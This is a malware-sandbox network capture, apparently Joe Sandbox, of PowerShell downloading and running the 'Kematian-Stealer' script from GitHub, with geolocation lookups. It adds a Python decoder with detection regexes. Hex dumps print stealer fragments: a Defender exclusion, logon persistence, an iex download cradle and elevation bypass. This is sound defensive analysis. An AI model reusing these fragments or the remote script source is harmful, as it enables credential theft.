Jul 3, 2024 18:10:07.967015982 CEST  80  49717  208.95.112.1  192.168.2.7
Timestamp  Source Port  Dest Port  Source IP  Dest IP
Jul 3, 2024 18:08:27.049423933 CEST  56552  53  192.168.2.7  1.1.1.1
Jul 3, 2024 18:08:27.057097912 CEST  53  56552  1.1.1.1  192.168.2.7
Jul 3, 2024 18:08:29.988281012 CEST  52466  53  192.168.2.7  1.1.1.1
Jul 3, 2024 18:08:29.995965004 CEST  53  52466  1.1.1.1  192.168.2.7
Jul 3, 2024 18:08:31.351383924 CEST  65075  53  192.168.2.7  1.1.1.1
Jul 3, 2024 18:08:31.360054970 CEST  53  65075  1.1.1.1  192.168.2.7
Jul 3, 2024 18:08:37.631095886 CEST  65281  53  192.168.2.7  1.1.1.1
Jul 3, 2024 18:08:37.641199112 CEST  53  65281  1.1.1.1  192.168.2.7
Jul 3, 2024 18:08:52.644654036 CEST  50898  53  192.168.2.7  1.1.1.1
Jul 3, 2024 18:08:52.651621103 CEST  53  50898  1.1.1.1  192.168.2.7
Timestamp  Source IP  Dest IP  Trans ID  OP Code  Name  Type  Class  DNS over HTTPS
Jul 3, 2024 18:08:27.049423933 CEST  192.168.2.7  1.1.1.1  0x1ca2  Standard query (0)  raw.githubusercontent.com  A (IP address)  IN (0x0001)  false
Jul 3, 2024 18:08:29.988281012 CEST  192.168.2.7  1.1.1.1  0x3c59  Standard query (0)  www.cloudflare.com  A (IP address)  IN (0x0001)  false
Jul 3, 2024 18:08:31.351383924 CEST  192.168.2.7  1.1.1.1  0x407d  Standard query (0)  ip-api.com  A (IP address)  IN (0x0001)  false
Jul 3, 2024 18:08:37.631095886 CEST  192.168.2.7  1.1.1.1  0xb59f  Standard query (0)  github.com  A (IP address)  IN (0x0001)  false
Jul 3, 2024 18:08:52.644654036 CEST  192.168.2.7  1.1.1.1  0x9555  Standard query (0)  objects.githubusercontent.com  A (IP address)  IN (0x0001)  false
Timestamp  Source IP  Dest IP  Trans ID  Reply Code  Name  CName  Address  Type  Class  DNS over HTTPS
Jul 3, 2024 18:08:27.057097912 CEST  1.1.1.1  192.168.2.7  0x1ca2  No error (0)  raw.githubusercontent.com  -  185.199.109.133  A (IP address)  IN (0x0001)  false
Jul 3, 2024 18:08:27.057097912 CEST  1.1.1.1  192.168.2.7  0x1ca2  No error (0)  raw.githubusercontent.com  -  185.199.111.133  A (IP address)  IN (0x0001)  false
Jul 3, 2024 18:08:27.057097912 CEST  1.1.1.1  192.168.2.7  0x1ca2  No error (0)  raw.githubusercontent.com  -  185.199.108.133  A (IP address)  IN (0x0001)  false
Jul 3, 2024 18:08:27.057097912 CEST  1.1.1.1  192.168.2.7  0x1ca2  No error (0)  raw.githubusercontent.com  -  185.199.110.133  A (IP address)  IN (0x0001)  false
Jul 3, 2024 18:08:29.995965004 CEST  1.1.1.1  192.168.2.7  0x3c59  No error (0)  www.cloudflare.com  -  104.16.123.96  A (IP address)  IN (0x0001)  false
Jul 3, 2024 18:08:29.995965004 CEST  1.1.1.1  192.168.2.7  0x3c59  No error (0)  www.cloudflare.com  -  104.16.124.96  A (IP address)  IN (0x0001)  false
Jul 3, 2024 18:08:31.360054970 CEST  1.1.1.1  192.168.2.7  0x407d  No error (0)  ip-api.com  -  208.95.112.1  A (IP address)  IN (0x0001)  false
Jul 3, 2024 18:08:37.641199112 CEST  1.1.1.1  192.168.2.7  0xb59f  No error (0)  github.com  -  140.82.121.3  A (IP address)  IN (0x0001)  false
Jul 3, 2024 18:08:52.651621103 CEST  1.1.1.1  192.168.2.7  0x9555  No error (0)  objects.githubusercontent.com  -  185.199.110.133  A (IP address)  IN (0x0001)  false
Jul 3, 2024 18:08:52.651621103 CEST  1.1.1.1  192.168.2.7  0x9555  No error (0)  objects.githubusercontent.com  -  185.199.109.133  A (IP address)  IN (0x0001)  false
Jul 3, 2024 18:08:52.651621103 CEST  1.1.1.1  192.168.2.7  0x9555  No error (0)  objects.githubusercontent.com  -  185.199.108.133  A (IP address)  IN (0x0001)  false
Jul 3, 2024 18:08:52.651621103 CEST  1.1.1.1  192.168.2.7  0x9555  No error (0)  objects.githubusercontent.com  -  185.199.111.133  A (IP address)  IN (0x0001)  false
                                      • raw.githubusercontent.com
                                      • www.cloudflare.com
                                      • github.com
                                      • objects.githubusercontent.com
                                      • ip-api.com
Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
0  192.168.2.7  49717  208.95.112.1  80  7696  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp  Bytes transferred  Direction  Data
Jul 3, 2024 18:08:31.366832018 CEST  175  OUT  GET /line/?fields=hosting HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: ip-api.com
Connection: Keep-Alive
Jul 3, 2024 18:08:31.868774891 CEST  175  IN  HTTP/1.1 200 OK
Date: Wed, 03 Jul 2024 16:08:31 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false
Jul 3, 2024 18:08:31.878092051 CEST  135  OUT  GET /json HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: ip-api.com
Jul 3, 2024 18:08:31.982695103 CEST  482  IN  HTTP/1.1 200 OK
Date: Wed, 03 Jul 2024 16:08:31 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 305
Access-Control-Allow-Origin: *
X-Ttl: 59
X-Rl: 43
Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.33"}


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
0  192.168.2.7  49711  185.199.109.133  443  7696  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp  Bytes transferred  Direction  Data
2024-07-03 16:08:27 UTC  230  OUT  GET /ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: raw.githubusercontent.com
Connection: Keep-Alive
2024-07-03 16:08:27 UTC  894  IN  HTTP/1.1 200 OK
Connection: close
Content-Length: 75387
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "7898c90ad61bf9f09ea5c7bdc5b7dff9483b68f37366fd1935629be43996f9e3"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 6851:1B3316:374460:3C2ACA:6685777B
Accept-Ranges: bytes
Date: Wed, 03 Jul 2024 16:08:27 GMT
Via: 1.1 varnish
X-Served-By: cache-ewr18180-EWR
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1720022908.651620,VS0,VE58
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: b50e1488f47c0692b38394eb7e79dd9a2b0970cc
Expires: Wed, 03 Jul 2024 16:13:27 GMT
Source-Age: 0
2024-07-03 16:08:27 UTC  1378  IN  Data Raw: 23 24 77 65 62 68 6f 6f 6b 20 3d 20 22 59 4f 55 52 5f 55 52 4c 5f 48 45 52 45 5f 53 45 52 56 45 52 22 20 0d 0a 23 24 64 65 62 75 67 20 3d 20 24 66 61 6c 73 65 0d 0a 23 24 62 6c 6f 63 6b 68 6f 73 74 73 66 69 6c 65 20 3d 20 24 66 61 6c 73 65 0d 0a 23 24 63 72 69 74 69 63 61 6c 70 72 6f 63 65 73 73 20 3d 20 24 66 61 6c 73 65 0d 0a 23 24 6d 65 6c 74 20 3d 20 24 66 61 6c 73 65 0d 0a 23 24 66 61 6b 65 65 72 72 6f 72 20 3d 20 24 66 61 6c 73 65 0d 0a 23 24 70 65 72 73 69 73 74 65 6e 63 65 20 3d 20 24 66 61 6c 73 65 0d 0a 23 24 77 72 69 74 65 5f 64 69 73 6b 5f 6f 6e 6c 79 20 3d 20 24 66 61 6c 73 65 0d 0a 23 24 76 6d 5f 70 72 6f 74 65 63 74 20 3d 20 24 66 61 6c 73 65 0d 0a 23 24 65 6e 63 72 79 70 74 69 6f 6e 5f 6b 65 79 20 3d 20 22 59 4f 55 52 5f 45 4e 43 5f 4b 45
Data Ascii: #$webhook = "YOUR_URL_HERE_SERVER" #$debug = $false#$blockhostsfile = $false#$criticalprocess = $false#$melt = $false#$fakeerror = $false#$persistence = $false#$write_disk_only = $false#$vm_protect = $false#$encryption_key = "YOUR_ENC_KE
2024-07-03 16:08:27 UTC  1378  IN  Data Raw: 20 27 6e 74 64 6c 6c 2e 64 6c 6c 27 2c 0d 0a 20 20 20 20 20 20 20 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 4d 65 74 68 6f 64 41 74 74 72 69 62 75 74 65 73 5d 3a 3a 50 75 62 6c 69 63 20 2d 62 6f 72 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 4d 65 74 68 6f 64 41 74 74 72 69 62 75 74 65 73 5d 3a 3a 53 74 61 74 69 63 20 2d 62 6f 72 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 4d 65 74 68 6f 64 41 74 74 72 69 62 75 74 65 73 5d 3a 3a 50 69 6e 76 6f 6b 65 49 6d 70 6c 2c 0d 0a 20 20 20 20 20 20 20 20 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 43 61 6c 6c 69 6e 67 43 6f 6e 76 65 6e 74 69 6f 6e 5d 3a 3a 57 69 6e 61 70 69 2c 20 5b 76 6f 69 64 5d 2c 20 5b 53 79 73
Data Ascii: 'ntdll.dll', [System.Reflection.MethodAttributes]::Public -bor [System.Reflection.MethodAttributes]::Static -bor [System.Reflection.MethodAttributes]::PinvokeImpl, [System.Runtime.InteropServices.CallingConvention]::Winapi, [void], [Sys
2024-07-03 16:08:27 UTC  1378  IN  Data Raw: 72 65 61 64 69 6e 67 2e 45 76 65 6e 74 52 65 73 65 74 4d 6f 64 65 5d 3a 3a 4d 61 6e 75 61 6c 52 65 73 65 74 29 2c 20 22 47 6c 6f 62 61 6c 5c 24 41 70 70 49 44 22 2c 20 28 5b 72 65 66 5d 20 24 43 72 65 61 74 65 64 4e 65 77 29 0d 0a 20 20 20 20 69 66 20 28 2d 6e 6f 74 20 24 43 72 65 61 74 65 64 4e 65 77 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 22 5b 21 5d 20 41 6e 20 69 6e 73 74 61 6e 63 65 20 6f 66 20 74 68 69 73 20 73 63 72 69 70 74 20 69 73 20 61 6c 72 65 61 64 79 20 72 75 6e 6e 69 6e 67 2e 22 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 69 66 20 28 24 63 72 69 74 69 63 61 6c 70 72 6f 63 65 73 73 20 2d 61 6e 64 20 2d 6e 6f 74 20 24 64 65 62 75 67 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 43 72 69 74 69 63 61 6c 50 72 6f 63 65 73 73 20
Data Ascii: reading.EventResetMode]::ManualReset), "Global\$AppID", ([ref] $CreatedNew) if (-not $CreatedNew) { throw "[!] An instance of this script is already running." } elseif ($criticalprocess -and -not $debug) { CriticalProcess
2024-07-03 16:08:27 UTC  1378  IN  Data Raw: 41 5c 54 65 6d 70 22 20 2d 46 6f 72 63 65 0d 0a 20 20 20 20 69 66 20 28 24 70 65 72 73 69 73 74 65 6e 63 65 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 41 64 64 2d 4d 70 50 72 65 66 65 72 65 6e 63 65 20 2d 45 78 63 6c 75 73 69 6f 6e 50 61 74 68 20 22 24 65 6e 76 3a 4c 4f 43 41 4c 41 50 50 44 41 54 41 5c 54 65 6d 70 22 20 2d 46 6f 72 63 65 0d 0a 20 20 20 20 20 20 20 20 41 64 64 2d 4d 70 50 72 65 66 65 72 65 6e 63 65 20 2d 45 78 63 6c 75 73 69 6f 6e 50 61 74 68 20 22 24 65 6e 76 3a 41 50 50 44 41 54 41 5c 4b 65 6d 61 74 69 61 6e 22 20 2d 46 6f 72 63 65 0d 0a 20 20 20 20 20 20 20 20 24 4b 44 4f 54 5f 44 49 52 20 3d 20 4e 65 77 2d 49 74 65 6d 20 2d 49 74 65 6d 54 79 70 65 20 44 69 72 65 63 74 6f 72 79 20 2d 50 61 74 68 20 22 24 65 6e 76 3a 41 50 50 44 41 54 41 5c
Data Ascii: A\Temp" -Force if ($persistence) { Add-MpPreference -ExclusionPath "$env:LOCALAPPDATA\Temp" -Force Add-MpPreference -ExclusionPath "$env:APPDATA\Kematian" -Force $KDOT_DIR = New-Item -ItemType Directory -Path "$env:APPDATA\
2024-07-03 16:08:27 UTC  1378  IN  Data Raw: 74 69 61 6e 2d 53 74 65 61 6c 65 72 2f 6d 61 69 6e 2f 66 72 6f 6e 74 65 6e 64 2d 73 72 63 2f 6d 61 69 6e 2e 70 73 31 27 7c 69 65 78 60 22 2c 30 29 28 77 69 6e 64 6f 77 2e 63 6c 6f 73 65 29 22 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 24 74 61 73 6b 5f 74 72 69 67 67 65 72 20 3d 20 4e 65 77 2d 53 63 68 65 64 75 6c 65 64 54 61 73 6b 54 72 69 67 67 65 72 20 2d 41 74 4c 6f 67 4f 6e 0d 0a 20 20 20 20 20 20 20 20 24 74 61 73 6b 5f 73 65 74 74 69 6e 67 73 20 3d 20 4e 65 77 2d 53 63 68 65 64 75 6c 65 64 54 61 73 6b 53 65 74 74 69 6e 67 73 53 65 74 20 2d 41 6c 6c 6f 77 53 74 61 72 74 49 66 4f 6e 42 61 74 74 65 72 69 65 73 20 2d 44 6f 6e 74 53 74 6f 70 49 66 47 6f 69 6e 67 4f 6e 42 61 74 74 65 72 69 65 73 20 2d 52 75 6e 4f 6e 6c 79 49 66 4e 65
Data Ascii: tian-Stealer/main/frontend-src/main.ps1'|iex`",0)(window.close)" } $task_trigger = New-ScheduledTaskTrigger -AtLogOn $task_settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -RunOnlyIfNe
2024-07-03 16:08:27 UTC  1378  IN  Data Raw: 22 20 2d 41 72 67 75 6d 65 6e 74 4c 69 73 74 20 22 2d 4e 6f 50 20 2d 45 70 20 42 79 70 61 73 73 20 2d 46 69 6c 65 20 60 22 24 50 53 43 6f 6d 6d 61 6e 64 50 61 74 68 60 22 22 20 2d 56 65 72 62 20 52 75 6e 41 73 3b 20 65 78 69 74 20 7d 20 63 61 74 63 68 20 7b 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 72 79 20 7b 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 22 70 6f 77 65 72 73 68 65 6c 6c 22 20 2d 41 72 67 75 6d 65 6e 74 4c 69 73 74 20 22 2d 57 69 6e 20 48 69 64 64 65 6e 20 2d 4e 6f 50 20 2d 45 70 20 42 79 70 61 73 73 20 2d 46 69 6c 65 20 60 22 24 50 53 43 6f 6d 6d 61 6e 64 50 61 74 68 60 22 22 20 2d 56 65 72 62 20 52 75 6e 41 73 3b 20 65 78 69 74 20 7d 20 63 61 74 63 68
Data Ascii: " -ArgumentList "-NoP -Ep Bypass -File `"$PSCommandPath`"" -Verb RunAs; exit } catch {} } else { try { Start-Process "powershell" -ArgumentList "-Win Hidden -NoP -Ep Bypass -File `"$PSCommandPath`"" -Verb RunAs; exit } catch
2024-07-03 16:08:27 UTC  1378  IN  Data Raw: 20 44 61 74 61 22 0d 0a 20 20 20 20 24 66 74 70 5f 63 6c 69 65 6e 74 73 20 3d 20 22 24 66 6f 6c 64 65 72 66 6f 72 6d 61 74 5c 46 54 50 20 43 6c 69 65 6e 74 73 22 0d 0a 20 20 20 20 24 70 61 73 73 77 6f 72 64 5f 6d 61 6e 61 67 65 72 73 20 3d 20 22 24 66 6f 6c 64 65 72 66 6f 72 6d 61 74 5c 50 61 73 73 77 6f 72 64 20 4d 61 6e 61 67 65 72 73 22 20 0d 0a 0d 0a 20 20 20 20 24 66 6f 6c 64 65 72 73 20 3d 20 40 28 24 66 6f 6c 64 65 72 5f 67 65 6e 65 72 61 6c 2c 20 24 66 6f 6c 64 65 72 5f 6d 65 73 73 61 67 69 6e 67 2c 20 24 66 6f 6c 64 65 72 5f 67 61 6d 69 6e 67 2c 20 24 66 6f 6c 64 65 72 5f 63 72 79 70 74 6f 2c 20 24 66 6f 6c 64 65 72 5f 76 70 6e 2c 20 24 66 6f 6c 64 65 72 5f 65 6d 61 69 6c 2c 20 24 69 6d 70 6f 72 74 61 6e 74 5f 66 69 6c 65 73 2c 20 24 62 72 6f 77
Data Ascii: Data" $ftp_clients = "$folderformat\FTP Clients" $password_managers = "$folderformat\Password Managers" $folders = @($folder_general, $folder_messaging, $folder_gaming, $folder_crypto, $folder_vpn, $folder_email, $important_files, $brow
2024-07-03 16:08:27 UTC  1378  IN  Data Raw: 70 20 60 6e 43 6f 75 6e 74 72 79 3a 20 24 63 6f 75 6e 74 72 79 20 60 6e 52 65 67 69 6f 6e 3a 20 24 72 65 67 69 6f 6e 4e 61 6d 65 20 60 6e 43 69 74 79 3a 20 24 63 69 74 79 20 60 6e 49 53 50 3a 20 24 69 73 70 20 60 6e 4c 61 74 69 74 75 64 65 3a 20 24 6c 61 74 20 60 6e 4c 6f 6e 67 69 74 75 64 65 3a 20 24 6c 6f 6e 20 60 6e 5a 69 70 3a 20 24 7a 69 70 20 60 6e 56 50 4e 2f 50 72 6f 78 79 3a 20 24 68 6f 73 74 69 6e 67 22 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 24 6e 65 74 77 6f 72 6b 69 6e 66 6f 20 3d 20 47 65 74 2d 4e 65 74 77 6f 72 6b 0d 0a 20 20 20 20 24 6c 61 6e 67 20 3d 20 28 47 65 74 2d 57 69 6e 55 73 65 72 4c 61 6e 67 75 61 67 65 4c 69 73 74 29 2e 4c 6f 63 61 6c 69 7a 65 64 4e 61 6d 65 0d 0a 20 20 20 20 24 64 61 74 65 20 3d 20 47 65 74 2d 44 61 74 65
Data Ascii: p `nCountry: $country `nRegion: $regionName `nCity: $city `nISP: $isp `nLatitude: $lat `nLongitude: $lon `nZip: $zip `nVPN/Proxy: $hosting" } $networkinfo = Get-Network $lang = (Get-WinUserLanguageList).LocalizedName $date = Get-Date
2024-07-03 16:08:27 UTC  1378  IN  Data Raw: 67 75 69 64 53 74 72 69 6e 67 20 3d 20 24 67 75 69 64 2e 54 6f 53 74 72 69 6e 67 28 29 0d 0a 20 20 20 20 24 73 75 66 66 69 78 20 3d 20 24 67 75 69 64 53 74 72 69 6e 67 2e 53 75 62 73 74 72 69 6e 67 28 30 2c 20 38 29 20 20 0d 0a 20 20 20 20 24 70 72 65 66 69 78 65 64 47 75 69 64 20 3d 20 22 4b 65 6d 61 74 69 61 6e 2d 53 74 65 61 6c 65 72 2d 22 20 2b 20 24 73 75 66 66 69 78 0d 0a 20 20 20 20 24 6b 65 6d 61 74 69 61 6e 5f 62 61 6e 6e 65 72 20 3d 20 28 22 34 70 57 55 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57
Data Ascii: guidString = $guid.ToString() $suffix = $guidString.Substring(0, 8) $prefixedGuid = "Kematian-Stealer-" + $suffix $kematian_banner = ("4pWU4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pW
2024-07-03 16:08:27 UTC  1378  IN  Data Raw: 61 49 34 70 61 49 34 70 57 55 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 64 34 70 57 61 34 70 57 51 34 70 57 51 34 70 61 49 34 70 61 49 34 70 57 55 34 70 57 51 34 70 57 51 34 70 57 64 34 70 61 49 34 70 61 49 34 70 57 55 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 64 34 70 61 49 34 70 61 49 34 70 57 55 34 70 57 51 34 70 57 51 34 70 61 49 34 70 61 49 34 70 57 58 34 70 61 49 34 70 61 49 34 70 57 52 49 43 41 67 49 43 44 69 6c 6f 6a 69 6c 6f 6a 69 6c 5a 54 69 6c 5a 44 69 6c 5a 44 69 6c 5a 44 69 6c 5a 44 69 6c 5a 33 69 6c 6f 6a 69 6c 6f 6a 69 6c 5a 54 69 6c 5a 44 69 6c 5a 44 69 6c 6f 6a 69 6c 6f 6a 69 6c 5a 66 69 6c 5a 45 4e 43 75 4b 56 6b 65 4b 57 69 4f 4b 57 69 4f 4b 57 69 4f 4b 57 69 4f 4b 57 69 4f 4b 56 6c 4f 4b 56 6e 53 44 69 6c
Data Ascii: aI4paI4pWU4pWQ4pWQ4pWQ4pWQ4pWd4pWa4pWQ4pWQ4paI4paI4pWU4pWQ4pWQ4pWd4paI4paI4pWU4pWQ4pWQ4pWQ4pWQ4pWd4paI4paI4pWU4pWQ4pWQ4paI4paI4pWX4paI4paI4pWRICAgICDilojilojilZTilZDilZDilZDilZDilZ3ilojilojilZTilZDilZDilojilojilZfilZENCuKVkeKWiOKWiOKWiOKWiOKWiOKVlOKVnSDil
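The Data Raw column is the faithful record of main.ps1 as it came off the wire; the Data Ascii rendering next to it drops the CRLF (0d 0a) pairs, which is why the script fragments read as one run-on line. The following is an added example, not Joe Sandbox or Kematian-Stealer code: it decodes three hex fragments copied from the Data Raw rows above (truncated exactly as they are on the page) back into text, and runs a small set of indicator rules over the result for the Defender exclusion, the at-logon scheduled task trigger, the `|iex` download cradle and the `-Ep Bypass ... -Verb RunAs` relaunch. The rule names and the choice of rules are assumptions for illustration.

```python
"""Decode Joe Sandbox "Data Raw" hex dumps back into text and scan them.

Added example, not Joe Sandbox or Kematian-Stealer code.  The hex below is
copied from the Data Raw rows of the raw.githubusercontent.com session
(truncated as on the page); rule names are assumptions.
"""
import re

# Fragments copied from the Data Raw rows above.  The 0d 0a pairs are the
# CRLF line breaks that the Data Ascii column collapses.
RAW_FRAGMENTS = [
    # Add-MpPreference -ExclusionPath "$env:LOCALAPPDATA\Temp"
    "41 5c 54 65 6d 70 22 20 2d 46 6f 72 63 65 0d 0a 20 20 20 20 69 66 20 28 24 70 65 72 73 69 73 74 65 6e 63 65 29 20 7b 0d 0a "
    "20 20 20 20 20 20 20 20 41 64 64 2d 4d 70 50 72 65 66 65 72 65 6e 63 65 20 2d 45 78 63 6c 75 73 69 6f 6e 50 61 74 68 20 22 "
    "24 65 6e 76 3a 4c 4f 43 41 4c 41 50 50 44 41 54 41 5c 54 65 6d 70 22 20 2d 46 6f 72 63 65 0d 0a",
    # ...main.ps1'|iex`",0)(window.close)" ... New-ScheduledTaskTrigger -AtLogOn
    "74 69 61 6e 2d 53 74 65 61 6c 65 72 2f 6d 61 69 6e 2f 66 72 6f 6e 74 65 6e 64 2d 73 72 63 2f 6d 61 69 6e 2e 70 73 31 27 7c "
    "69 65 78 60 22 2c 30 29 28 77 69 6e 64 6f 77 2e 63 6c 6f 73 65 29 22 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 "
    "20 20 20 24 74 61 73 6b 5f 74 72 69 67 67 65 72 20 3d 20 4e 65 77 2d 53 63 68 65 64 75 6c 65 64 54 61 73 6b 54 72 69 67 67 "
    "65 72 20 2d 41 74 4c 6f 67 4f 6e 0d 0a",
    # -ArgumentList "-NoP -Ep Bypass -File `"$PSCommandPath`"" -Verb RunAs; exit
    "22 20 2d 41 72 67 75 6d 65 6e 74 4c 69 73 74 20 22 2d 4e 6f 50 20 2d 45 70 20 42 79 70 61 73 73 20 2d 46 69 6c 65 20 60 22 "
    "24 50 53 43 6f 6d 6d 61 6e 64 50 61 74 68 60 22 22 20 2d 56 65 72 62 20 52 75 6e 41 73 3b 20 65 78 69 74 20 7d 20 63 61 74 "
    "63 68 20 7b 7d",
]

# Indicator rules (names and patterns are assumptions for illustration).
INDICATORS = [
    ("defender_exclusion", re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I)),
    ("logon_task", re.compile(r"New-ScheduledTaskTrigger\s+-AtLogOn", re.I)),
    ("download_cradle", re.compile(r"\|\s*iex\b", re.I)),
    ("ep_bypass_elevate", re.compile(r"-Ep\s+Bypass.*?-Verb\s+RunAs", re.I)),
]


def decode_data_raw(hex_dump: str) -> str:
    """Turn a space-separated Joe Sandbox hex dump into text.

    bytes.fromhex() ignores the whitespace between byte pairs, and the
    decoded text keeps its original CRLF line breaks.
    """
    return bytes.fromhex(hex_dump).decode("utf-8", errors="replace")


def scan(text: str) -> list:
    """Return the sorted names of every indicator that matches the text."""
    return sorted(name for name, pattern in INDICATORS if pattern.search(text))


def scan_fragments(fragments) -> tuple:
    """Decode and concatenate hex fragments, then scan the combined text."""
    decoded = "".join(decode_data_raw(f) for f in fragments)
    return decoded, scan(decoded)


if __name__ == "__main__":
    text, hits = scan_fragments(RAW_FRAGMENTS)
    for line in text.split("\r\n"):
        print(repr(line))
    print("indicators:", hits)
```

Run against a full capture, feed every Data Raw row of one session to `scan_fragments` in order; splitting on `\r\n` after decoding gives back the script's real line structure, which the Data Ascii column loses.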


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1  192.168.2.7  49715  104.16.123.96  443  7696  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp  Bytes transferred  Direction  Data
2024-07-03 16:08:30 UTC  176  OUT  GET /cdn-cgi/trace HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: www.cloudflare.com
Connection: Keep-Alive
2024-07-03 16:08:30 UTC  332  IN  HTTP/1.1 200 OK
Date: Wed, 03 Jul 2024 16:08:30 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: close
Access-Control-Allow-Origin: *
Server: cloudflare
CF-RAY: 89d822770edf42cb-EWR
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
2024-07-03 16:08:30 UTC  285  IN  Data Raw: 31 31 36 0d 0a 66 6c 3d 36 35 30 66 31 38 36 0a 68 3d 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 0a 74 73 3d 31 37 32 30 30 32 32 39 31 30 2e 35 36 38 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 3b 20 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 65 6e 2d 55 53 29 20 57 69 6e 64 6f 77 73 50 6f 77 65 72 53 68 65 6c 6c 2f 35 2e 31 2e 31 39 30 34 31 2e 31 36 38 32 0a 63 6f 6c 6f 3d 45 57 52 0a 73 6c 69 76 65 72 3d 6e 6f 6e 65 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 